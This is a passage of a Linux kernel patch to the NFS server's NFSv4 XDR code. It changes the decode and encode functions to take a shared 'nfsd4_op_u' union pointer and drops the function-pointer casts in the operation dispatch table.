+@@ -1452,16 +1483,20 @@ nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp, struct nfsd4_rel
+ 	return nfs_ok;
+ }
+ 
+-static __be32 nfsd4_decode_backchannel_ctl(struct nfsd4_compoundargs *argp, struct nfsd4_backchannel_ctl *bc)
++static __be32 nfsd4_decode_backchannel_ctl(struct nfsd4_compoundargs *argp,
++					   union nfsd4_op_u *u)
+ {
++	struct nfsd4_backchannel_ctl *bc = &u->backchannel_ctl;
+ 	memset(bc, 0, sizeof(*bc));
+ 	if (xdr_stream_decode_u32(argp->xdr, &bc->bc_cb_program) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfsd4_decode_cb_sec(argp, &bc->bc_cb_sec);
+ }
+ 
+-static __be32 nfsd4_decode_bind_conn_to_session(struct nfsd4_compoundargs *argp, struct nfsd4_bind_conn_to_session *bcts)
++static __be32 nfsd4_decode_bind_conn_to_session(struct nfsd4_compoundargs *argp,
++						union nfsd4_op_u *u)
+ {
++	struct nfsd4_bind_conn_to_session *bcts = &u->bind_conn_to_session;
+ 	u32 use_conn_in_rdma_mode;
+ 	__be32 status;
+ 
+@@ -1603,8 +1638,9 @@ nfsd4_decode_nfs_impl_id4(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_exchange_id(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_exchange_id *exid)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_exchange_id *exid = &u->exchange_id;
+ 	__be32 status;
+ 
+ 	memset(exid, 0, sizeof(*exid));
+@@ -1656,8 +1692,9 @@ nfsd4_decode_channel_attrs4(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_create_session(struct nfsd4_compoundargs *argp,
+-			    struct nfsd4_create_session *sess)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create_session *sess = &u->create_session;
+ 	__be32 status;
+ 
+ 	memset(sess, 0, sizeof(*sess));
+@@ -1681,23 +1718,26 @@ nfsd4_decode_create_session(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_destroy_session(struct nfsd4_compoundargs *argp,
+-			     struct nfsd4_destroy_session *destroy_session)
++			     union nfsd4_op_u *u)
+ {
++	struct nfsd4_destroy_session *destroy_session = &u->destroy_session;
+ 	return nfsd4_decode_sessionid4(argp, &destroy_session->sessionid);
+ }
+ 
+ static __be32
+ nfsd4_decode_free_stateid(struct nfsd4_compoundargs *argp,
+-			  struct nfsd4_free_stateid *free_stateid)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_free_stateid *free_stateid = &u->free_stateid;
+ 	return nfsd4_decode_stateid4(argp, &free_stateid->fr_stateid);
+ }
+ 
+ #ifdef CONFIG_NFSD_PNFS
+ static __be32
+ nfsd4_decode_getdeviceinfo(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_getdeviceinfo *gdev)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_getdeviceinfo *gdev = &u->getdeviceinfo;
+ 	__be32 status;
+ 
+ 	memset(gdev, 0, sizeof(*gdev));
+@@ -1717,8 +1757,9 @@ nfsd4_decode_getdeviceinfo(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_layoutcommit(struct nfsd4_compoundargs *argp,
+-			  struct nfsd4_layoutcommit *lcp)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutcommit *lcp = &u->layoutcommit;
+ 	__be32 *p, status;
+ 
+ 	memset(lcp, 0, sizeof(*lcp));
+@@ -1753,8 +1794,9 @@ nfsd4_decode_layoutcommit(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_layoutget(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_layoutget *lgp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutget *lgp = &u->layoutget;
+ 	__be32 status;
+ 
+ 	memset(lgp, 0, sizeof(*lgp));
+@@ -1781,8 +1823,9 @@ nfsd4_decode_layoutget(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_layoutreturn(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_layoutreturn *lrp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutreturn *lrp = &u->layoutreturn;
+ 	memset(lrp, 0, sizeof(*lrp));
+ 	if (xdr_stream_decode_bool(argp->xdr, &lrp->lr_reclaim) < 0)
+ 		return nfserr_bad_xdr;
+@@ -1795,8 +1838,9 @@ nfsd4_decode_layoutreturn(struct nfsd4_compoundargs *argp,
+ #endif /* CONFIG_NFSD_PNFS */
+ 
+ static __be32 nfsd4_decode_secinfo_no_name(struct nfsd4_compoundargs *argp,
+-					   struct nfsd4_secinfo_no_name *sin)
++					   union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo_no_name *sin = &u->secinfo_no_name;
+ 	if (xdr_stream_decode_u32(argp->xdr, &sin->sin_style) < 0)
+ 		return nfserr_bad_xdr;
+ 
+@@ -1806,8 +1850,9 @@ static __be32 nfsd4_decode_secinfo_no_name(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_sequence(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_sequence *seq)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_sequence *seq = &u->sequence;
+ 	__be32 *p, status;
+ 
+ 	status = nfsd4_decode_sessionid4(argp, &seq->sessionid);
+@@ -1826,8 +1871,10 @@ nfsd4_decode_sequence(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp, struct nfsd4_test_stateid *test_stateid)
++nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_test_stateid *test_stateid = &u->test_stateid;
+ 	struct nfsd4_test_stateid_id *stateid;
+ 	__be32 status;
+ 	u32 i;
+@@ -1852,14 +1899,16 @@ nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp, struct nfsd4_test_sta
+ }
+ 
+ static __be32 nfsd4_decode_destroy_clientid(struct nfsd4_compoundargs *argp,
+-					    struct nfsd4_destroy_clientid *dc)
++					    union nfsd4_op_u *u)
+ {
++	struct nfsd4_destroy_clientid *dc = &u->destroy_clientid;
+ 	return nfsd4_decode_clientid4(argp, &dc->clientid);
+ }
+ 
+ static __be32 nfsd4_decode_reclaim_complete(struct nfsd4_compoundargs *argp,
+-					    struct nfsd4_reclaim_complete *rc)
++					    union nfsd4_op_u *u)
+ {
++	struct nfsd4_reclaim_complete *rc = &u->reclaim_complete;
+ 	if (xdr_stream_decode_bool(argp->xdr, &rc->rca_one_fs) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfs_ok;
+@@ -1867,8 +1916,9 @@ static __be32 nfsd4_decode_reclaim_complete(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_fallocate(struct nfsd4_compoundargs *argp,
+-		       struct nfsd4_fallocate *fallocate)
++		       union nfsd4_op_u *u)
+ {
++	struct nfsd4_fallocate *fallocate = &u->allocate;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &fallocate->falloc_stateid);
+@@ -1924,8 +1974,9 @@ static __be32 nfsd4_decode_nl4_server(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_copy(struct nfsd4_compoundargs *argp, struct nfsd4_copy *copy)
++nfsd4_decode_copy(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy *copy = &u->copy;
+ 	u32 consecutive, i, count, sync;
+ 	struct nl4_server *ns_dummy;
+ 	__be32 status;
+@@ -1982,8 +2033,9 @@ nfsd4_decode_copy(struct nfsd4_compoundargs *argp, struct nfsd4_copy *copy)
+ 
+ static __be32
+ nfsd4_decode_copy_notify(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_copy_notify *cn)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy_notify *cn = &u->copy_notify;
+ 	__be32 status;
+ 
+ 	memset(cn, 0, sizeof(*cn));
+@@ -2002,16 +2054,18 @@ nfsd4_decode_copy_notify(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_offload_status(struct nfsd4_compoundargs *argp,
+-			    struct nfsd4_offload_status *os)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_offload_status *os = &u->offload_status;
+ 	os->count = 0;
+ 	os->status = 0;
+ 	return nfsd4_decode_stateid4(argp, &os->stateid);
+ }
+ 
+ static __be32
+-nfsd4_decode_seek(struct nfsd4_compoundargs *argp, struct nfsd4_seek *seek)
++nfsd4_decode_seek(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_seek *seek = &u->seek;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &seek->seek_stateid);
+@@ -2028,8 +2082,9 @@ nfsd4_decode_seek(struct nfsd4_compoundargs *argp, struct nfsd4_seek *seek)
+ }
+ 
+ static __be32
+-nfsd4_decode_clone(struct nfsd4_compoundargs *argp, struct nfsd4_clone *clone)
++nfsd4_decode_clone(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_clone *clone = &u->clone;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &clone->cl_src_stateid);
+@@ -2154,8 +2209,9 @@ nfsd4_decode_xattr_name(struct nfsd4_compoundargs *argp, char **namep)
+  */
+ static __be32
+ nfsd4_decode_getxattr(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_getxattr *getxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_getxattr *getxattr = &u->getxattr;
+ 	__be32 status;
+ 	u32 maxcount;
+ 
+@@ -2173,8 +2229,9 @@ nfsd4_decode_getxattr(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_setxattr(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_setxattr *setxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_setxattr *setxattr = &u->setxattr;
+ 	u32 flags, maxcount, size;
+ 	__be32 status;
+ 
+@@ -2214,8 +2271,9 @@ nfsd4_decode_setxattr(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_listxattrs(struct nfsd4_compoundargs *argp,
+-			struct nfsd4_listxattrs *listxattrs)
++			union nfsd4_op_u *u)
+ {
++	struct nfsd4_listxattrs *listxattrs = &u->listxattrs;
+ 	u32 maxcount;
+ 
+ 	memset(listxattrs, 0, sizeof(*listxattrs));
+@@ -2245,113 +2303,114 @@ nfsd4_decode_listxattrs(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_removexattr(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_removexattr *removexattr)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_removexattr *removexattr = &u->removexattr;
+ 	memset(removexattr, 0, sizeof(*removexattr));
+ 	return nfsd4_decode_xattr_name(argp, &removexattr->rmxa_name);
+ }
+ 
+ static __be32
+-nfsd4_decode_noop(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_noop(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+-nfsd4_decode_notsupp(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_notsupp(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	return nfserr_notsupp;
+ }
+ 
+-typedef __be32(*nfsd4_dec)(struct nfsd4_compoundargs *argp, void *);
++typedef __be32(*nfsd4_dec)(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u);
+ 
+ static const nfsd4_dec nfsd4_dec_ops[] = {
+-	[OP_ACCESS]		= (nfsd4_dec)nfsd4_decode_access,
+-	[OP_CLOSE]		= (nfsd4_dec)nfsd4_decode_close,
+-	[OP_COMMIT]		= (nfsd4_dec)nfsd4_decode_commit,
+-	[OP_CREATE]		= (nfsd4_dec)nfsd4_decode_create,
+-	[OP_DELEGPURGE]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_DELEGRETURN]	= (nfsd4_dec)nfsd4_decode_delegreturn,
+-	[OP_GETATTR]		= (nfsd4_dec)nfsd4_decode_getattr,
+-	[OP_GETFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_LINK]		= (nfsd4_dec)nfsd4_decode_link,
+-	[OP_LOCK]		= (nfsd4_dec)nfsd4_decode_lock,
+-	[OP_LOCKT]		= (nfsd4_dec)nfsd4_decode_lockt,
+-	[OP_LOCKU]		= (nfsd4_dec)nfsd4_decode_locku,
+-	[OP_LOOKUP]		= (nfsd4_dec)nfsd4_decode_lookup,
+-	[OP_LOOKUPP]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_NVERIFY]		= (nfsd4_dec)nfsd4_decode_verify,
+-	[OP_OPEN]		= (nfsd4_dec)nfsd4_decode_open,
+-	[OP_OPENATTR]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_OPEN_CONFIRM]	= (nfsd4_dec)nfsd4_decode_open_confirm,
+-	[OP_OPEN_DOWNGRADE]	= (nfsd4_dec)nfsd4_decode_open_downgrade,
+-	[OP_PUTFH]		= (nfsd4_dec)nfsd4_decode_putfh,
+-	[OP_PUTPUBFH]		= (nfsd4_dec)nfsd4_decode_putpubfh,
+-	[OP_PUTROOTFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_READ]		= (nfsd4_dec)nfsd4_decode_read,
+-	[OP_READDIR]		= (nfsd4_dec)nfsd4_decode_readdir,
+-	[OP_READLINK]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_REMOVE]		= (nfsd4_dec)nfsd4_decode_remove,
+-	[OP_RENAME]		= (nfsd4_dec)nfsd4_decode_rename,
+-	[OP_RENEW]		= (nfsd4_dec)nfsd4_decode_renew,
+-	[OP_RESTOREFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_SAVEFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_SECINFO]		= (nfsd4_dec)nfsd4_decode_secinfo,
+-	[OP_SETATTR]		= (nfsd4_dec)nfsd4_decode_setattr,
+-	[OP_SETCLIENTID]	= (nfsd4_dec)nfsd4_decode_setclientid,
+-	[OP_SETCLIENTID_CONFIRM] = (nfsd4_dec)nfsd4_decode_setclientid_confirm,
+-	[OP_VERIFY]		= (nfsd4_dec)nfsd4_decode_verify,
+-	[OP_WRITE]		= (nfsd4_dec)nfsd4_decode_write,
+-	[OP_RELEASE_LOCKOWNER]	= (nfsd4_dec)nfsd4_decode_release_lockowner,
++	[OP_ACCESS]		= nfsd4_decode_access,
++	[OP_CLOSE]		= nfsd4_decode_close,
++	[OP_COMMIT]		= nfsd4_decode_commit,
++	[OP_CREATE]		= nfsd4_decode_create,
++	[OP_DELEGPURGE]		= nfsd4_decode_notsupp,
++	[OP_DELEGRETURN]	= nfsd4_decode_delegreturn,
++	[OP_GETATTR]		= nfsd4_decode_getattr,
++	[OP_GETFH]		= nfsd4_decode_noop,
++	[OP_LINK]		= nfsd4_decode_link,
++	[OP_LOCK]		= nfsd4_decode_lock,
++	[OP_LOCKT]		= nfsd4_decode_lockt,
++	[OP_LOCKU]		= nfsd4_decode_locku,
++	[OP_LOOKUP]		= nfsd4_decode_lookup,
++	[OP_LOOKUPP]		= nfsd4_decode_noop,
++	[OP_NVERIFY]		= nfsd4_decode_verify,
++	[OP_OPEN]		= nfsd4_decode_open,
++	[OP_OPENATTR]		= nfsd4_decode_notsupp,
++	[OP_OPEN_CONFIRM]	= nfsd4_decode_open_confirm,
++	[OP_OPEN_DOWNGRADE]	= nfsd4_decode_open_downgrade,
++	[OP_PUTFH]		= nfsd4_decode_putfh,
++	[OP_PUTPUBFH]		= nfsd4_decode_putpubfh,
++	[OP_PUTROOTFH]		= nfsd4_decode_noop,
++	[OP_READ]		= nfsd4_decode_read,
++	[OP_READDIR]		= nfsd4_decode_readdir,
++	[OP_READLINK]		= nfsd4_decode_noop,
++	[OP_REMOVE]		= nfsd4_decode_remove,
++	[OP_RENAME]		= nfsd4_decode_rename,
++	[OP_RENEW]		= nfsd4_decode_renew,
++	[OP_RESTOREFH]		= nfsd4_decode_noop,
++	[OP_SAVEFH]		= nfsd4_decode_noop,
++	[OP_SECINFO]		= nfsd4_decode_secinfo,
++	[OP_SETATTR]		= nfsd4_decode_setattr,
++	[OP_SETCLIENTID]	= nfsd4_decode_setclientid,
++	[OP_SETCLIENTID_CONFIRM] = nfsd4_decode_setclientid_confirm,
++	[OP_VERIFY]		= nfsd4_decode_verify,
++	[OP_WRITE]		= nfsd4_decode_write,
++	[OP_RELEASE_LOCKOWNER]	= nfsd4_decode_release_lockowner,
+ 
+ 	/* new operations for NFSv4.1 */
+-	[OP_BACKCHANNEL_CTL]	= (nfsd4_dec)nfsd4_decode_backchannel_ctl,
+-	[OP_BIND_CONN_TO_SESSION]= (nfsd4_dec)nfsd4_decode_bind_conn_to_session,
+-	[OP_EXCHANGE_ID]	= (nfsd4_dec)nfsd4_decode_exchange_id,
+-	[OP_CREATE_SESSION]	= (nfsd4_dec)nfsd4_decode_create_session,
+-	[OP_DESTROY_SESSION]	= (nfsd4_dec)nfsd4_decode_destroy_session,
+-	[OP_FREE_STATEID]	= (nfsd4_dec)nfsd4_decode_free_stateid,
+-	[OP_GET_DIR_DELEGATION]	= (nfsd4_dec)nfsd4_decode_notsupp,
++	[OP_BACKCHANNEL_CTL]	= nfsd4_decode_backchannel_ctl,
++	[OP_BIND_CONN_TO_SESSION] = nfsd4_decode_bind_conn_to_session,
++	[OP_EXCHANGE_ID]	= nfsd4_decode_exchange_id,
++	[OP_CREATE_SESSION]	= nfsd4_decode_create_session,
++	[OP_DESTROY_SESSION]	= nfsd4_decode_destroy_session,
++	[OP_FREE_STATEID]	= nfsd4_decode_free_stateid,
++	[OP_GET_DIR_DELEGATION]	= nfsd4_decode_notsupp,
+ #ifdef CONFIG_NFSD_PNFS
+-	[OP_GETDEVICEINFO]	= (nfsd4_dec)nfsd4_decode_getdeviceinfo,
+-	[OP_GETDEVICELIST]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_dec)nfsd4_decode_layoutcommit,
+-	[OP_LAYOUTGET]		= (nfsd4_dec)nfsd4_decode_layoutget,
+-	[OP_LAYOUTRETURN]	= (nfsd4_dec)nfsd4_decode_layoutreturn,
++	[OP_GETDEVICEINFO]	= nfsd4_decode_getdeviceinfo,
++	[OP_GETDEVICELIST]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTCOMMIT]	= nfsd4_decode_layoutcommit,
++	[OP_LAYOUTGET]		= nfsd4_decode_layoutget,
++	[OP_LAYOUTRETURN]	= nfsd4_decode_layoutreturn,
+ #else
+-	[OP_GETDEVICEINFO]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_GETDEVICELIST]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTGET]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTRETURN]	= (nfsd4_dec)nfsd4_decode_notsupp,
++	[OP_GETDEVICEINFO]	= nfsd4_decode_notsupp,
++	[OP_GETDEVICELIST]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTCOMMIT]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTGET]		= nfsd4_decode_notsupp,
++	[OP_LAYOUTRETURN]	= nfsd4_decode_notsupp,
+ #endif
+-	[OP_SECINFO_NO_NAME]	= (nfsd4_dec)nfsd4_decode_secinfo_no_name,
+-	[OP_SEQUENCE]		= (nfsd4_dec)nfsd4_decode_sequence,
+-	[OP_SET_SSV]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_TEST_STATEID]	= (nfsd4_dec)nfsd4_decode_test_stateid,
+-	[OP_WANT_DELEGATION]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_DESTROY_CLIENTID]	= (nfsd4_dec)nfsd4_decode_destroy_clientid,
+-	[OP_RECLAIM_COMPLETE]	= (nfsd4_dec)nfsd4_decode_reclaim_complete,
++	[OP_SECINFO_NO_NAME]	= nfsd4_decode_secinfo_no_name,
++	[OP_SEQUENCE]		= nfsd4_decode_sequence,
++	[OP_SET_SSV]		= nfsd4_decode_notsupp,
++	[OP_TEST_STATEID]	= nfsd4_decode_test_stateid,
++	[OP_WANT_DELEGATION]	= nfsd4_decode_notsupp,
++	[OP_DESTROY_CLIENTID]	= nfsd4_decode_destroy_clientid,
++	[OP_RECLAIM_COMPLETE]	= nfsd4_decode_reclaim_complete,
+ 
+ 	/* new operations for NFSv4.2 */
+-	[OP_ALLOCATE]		= (nfsd4_dec)nfsd4_decode_fallocate,
+-	[OP_COPY]		= (nfsd4_dec)nfsd4_decode_copy,
+-	[OP_COPY_NOTIFY]	= (nfsd4_dec)nfsd4_decode_copy_notify,
+-	[OP_DEALLOCATE]		= (nfsd4_dec)nfsd4_decode_fallocate,
+-	[OP_IO_ADVISE]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTERROR]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTSTATS]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_OFFLOAD_CANCEL]	= (nfsd4_dec)nfsd4_decode_offload_status,
+-	[OP_OFFLOAD_STATUS]	= (nfsd4_dec)nfsd4_decode_offload_status,
+-	[OP_READ_PLUS]		= (nfsd4_dec)nfsd4_decode_read,
+-	[OP_SEEK]		= (nfsd4_dec)nfsd4_decode_seek,
+-	[OP_WRITE_SAME]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_CLONE]		= (nfsd4_dec)nfsd4_decode_clone,
++	[OP_ALLOCATE]		= nfsd4_decode_fallocate,
++	[OP_COPY]		= nfsd4_decode_copy,
++	[OP_COPY_NOTIFY]	= nfsd4_decode_copy_notify,
++	[OP_DEALLOCATE]		= nfsd4_decode_fallocate,
++	[OP_IO_ADVISE]		= nfsd4_decode_notsupp,
++	[OP_LAYOUTERROR]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTSTATS]	= nfsd4_decode_notsupp,
++	[OP_OFFLOAD_CANCEL]	= nfsd4_decode_offload_status,
++	[OP_OFFLOAD_STATUS]	= nfsd4_decode_offload_status,
++	[OP_READ_PLUS]		= nfsd4_decode_read,
++	[OP_SEEK]		= nfsd4_decode_seek,
++	[OP_WRITE_SAME]		= nfsd4_decode_notsupp,
++	[OP_CLONE]		= nfsd4_decode_clone,
+ 	/* RFC 8276 extended atributes operations */
+-	[OP_GETXATTR]		= (nfsd4_dec)nfsd4_decode_getxattr,
+-	[OP_SETXATTR]		= (nfsd4_dec)nfsd4_decode_setxattr,
+-	[OP_LISTXATTRS]		= (nfsd4_dec)nfsd4_decode_listxattrs,
+-	[OP_REMOVEXATTR]	= (nfsd4_dec)nfsd4_decode_removexattr,
++	[OP_GETXATTR]		= nfsd4_decode_getxattr,
++	[OP_SETXATTR]		= nfsd4_decode_setxattr,
++	[OP_LISTXATTRS]		= nfsd4_decode_listxattrs,
++	[OP_REMOVEXATTR]	= nfsd4_decode_removexattr,
+ };
+ 
+ static inline bool
+@@ -3643,8 +3702,10 @@ nfsd4_encode_stateid(struct xdr_stream *xdr, stateid_t *sid)
+ }
+ 
+ static __be32
+-nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_access *access)
++nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_access *access = &u->access;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3656,8 +3717,10 @@ nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ 	return 0;
+ }
+ 
+-static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_bind_conn_to_session *bcts)
++static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp, __be32 nfserr,
++						union nfsd4_op_u *u)
+ {
++	struct nfsd4_bind_conn_to_session *bcts = &u->bind_conn_to_session;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3673,8 +3736,10 @@ static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp,
+ }
+ 
+ static __be32
+-nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_close *close)
++nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_close *close = &u->close;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &close->cl_stateid);
+@@ -3682,8 +3747,10 @@ nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_c
+ 
+ 
+ static __be32
+-nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_commit *commit)
++nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_commit *commit = &u->commit;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3696,8 +3763,10 @@ nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_create *create)
++nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create *create = &u->create;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3710,8 +3779,10 @@ nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_getattr *getattr)
++nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_getattr *getattr = &u->getattr;
+ 	struct svc_fh *fhp = getattr->ga_fhp;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+@@ -3720,8 +3791,10 @@ nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_getfh(struct nfsd4_compoundres *resp, __be32 nfserr, struct svc_fh **fhpp)
++nfsd4_encode_getfh(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct svc_fh **fhpp = &u->getfh;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	struct svc_fh *fhp = *fhpp;
+ 	unsigned int len;
+@@ -3775,8 +3848,10 @@ nfsd4_encode_lock_denied(struct xdr_stream *xdr, struct nfsd4_lock_denied *ld)
+ }
+ 
+ static __be32
+-nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lock *lock)
++nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_lock *lock = &u->lock;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	if (!nfserr)
+@@ -3788,8 +3863,10 @@ nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lo
+ }
+ 
+ static __be32
+-nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lockt *lockt)
++nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_lockt *lockt = &u->lockt;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	if (nfserr == nfserr_denied)
+@@ -3798,8 +3875,10 @@ nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_l
+ }
+ 
+ static __be32
+-nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_locku *locku)
++nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_locku *locku = &u->locku;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &locku->lu_stateid);
+@@ -3807,8 +3886,10 @@ nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_l
+ 
+ 
+ static __be32
+-nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_link *link)
++nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_link *link = &u->link;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3821,8 +3902,10 @@ nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_li
+ 
+ 
+ static __be32
+-nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open *open)
++nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
